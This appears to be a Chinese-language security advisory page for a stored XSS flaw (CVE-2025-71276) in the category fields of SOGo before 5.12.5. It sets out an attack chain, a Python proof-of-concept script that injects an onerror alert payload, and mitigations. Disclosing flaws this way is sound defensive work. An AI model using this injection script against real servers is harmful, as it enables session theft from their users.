CVE-2025-71276 CVSS 6.4 中危

CVE-2025-71276 SOGo跨站脚本漏洞

披露日期: 2026-03-22

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-71276

漏洞类型

跨站脚本 (XSS)

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

SOGo

漏洞概述

SOGo 5.12.5 之前的版本中存在一个存储型跨站脚本（XSS）漏洞，该漏洞影响事件、任务和联系人的分类功能。攻击者可以通过精心构造的恶意数据注入到系统分类中，当低权限用户访问或交互这些被污染的数据时，恶意脚本将在浏览器端自动执行。此漏洞可能被用于窃取用户凭证、执行未授权操作或进行钓鱼攻击。

技术细节

该漏洞的根本原因是 SOGo 在处理用户提交的事件、任务及联系人分类名称时，缺乏严格的输出编码或输入验证机制。攻击者首先需要具备低权限账户登录权限，随后在创建或编辑相关对象时，将包含 JavaScript 的恶意代码注入到“分类”字段中。由于应用后端在生成前端页面时，直接将用户输入的内容渲染到 HTML 响应中而未进行适当的 HTML 实体转义，导致了存储型 XSS 漏洞的产生。根据 CVSS 向量分析，该漏洞具有范围改变（S:C）特性，这意味着攻击载荷的执行可能会影响当前安全上下文之外的组件或用户，从而扩大了攻击面。利用此漏洞，攻击者可以轻松绕过浏览器的同源策略，窃取受害者的 Session Cookie、读取敏感的 DOM 数据，或者模拟用户向服务器发送伪造请求，进一步横向渗透内网系统。

攻击链分析

STEP 1

1. 侦察与认证

攻击者获取一个有效的低权限账户，成功登录到 SOGo 群件系统。

STEP 2

2. 恶意注入

攻击者在创建或编辑事件、任务或联系人时，在“分类”字段中输入包含 JavaScript 的恶意代码并保存。

STEP 3

3. 诱导访问

当管理员或其他合法用户访问包含该恶意分类的日历、任务列表或联系人页面时，服务器解析数据。

STEP 4

4. 执行攻击

受害者的浏览器渲染未转义的恶意脚本，执行攻击者预设的代码，导致 Cookie 窃取或会话劫持。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Proof of Concept for CVE-2025-71276
# Target: SOGo < 5.12.5
# Vulnerability Type: Stored XSS in Event/Task/Contact Categories

target_url = "http://target-sogo-domain/SOGo/so/user/Contacts/"
login_url = "http://target-sogo-domain/SOGo/connect"

session = requests.Session()

# 1. Authenticate (Adjust credentials as needed)
login_data = {
    "userName": "attacker",
    "password": "password",
    "language": "en",
    "noCookies": "0"
}
session.post(login_url, data=login_data)

# 2. Prepare Malicious Payload
# Injecting script into the category field
xss_payload = '<img src=x onerror=alert("CVE-2025-71276-XSS")>'

# 3. Create Contact with Malicious Category
contact_headers = {
    "Content-Type": "application/json",
    "Accept": "application/json"
}

# Simulating API call to add a contact
contact_data = {
    "c_name": "Test Contact",
    "c_givenname": "Test",
    "c_sn": "User",
    "categories": xss_payload,  # Vulnerable parameter
    "tel_cell": "123456789"
}

try:
    response = session.post(target_url, json=contact_data, headers=contact_headers)
    if response.status_code == 200:
        print("[+] Payload injected successfully!")
        print("[+] Check the Contacts page to trigger the XSS.")
    else:
        print(f"[-] Failed to inject. Status code: {response.status_code}")
except Exception as e:
    print(f"[!] Error: {e}")

影响范围

SOGo < 5.12.5

防御指南

临时缓解措施

在无法立即升级的情况下，建议管理员部署 Web 应用防火墙（WAF）以拦截针对分类字段的 XSS 攻击特征。同时，应加强对用户输入的过滤，禁止在分类名称中使用特殊字符，并对现有数据库中的数据进行清理。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表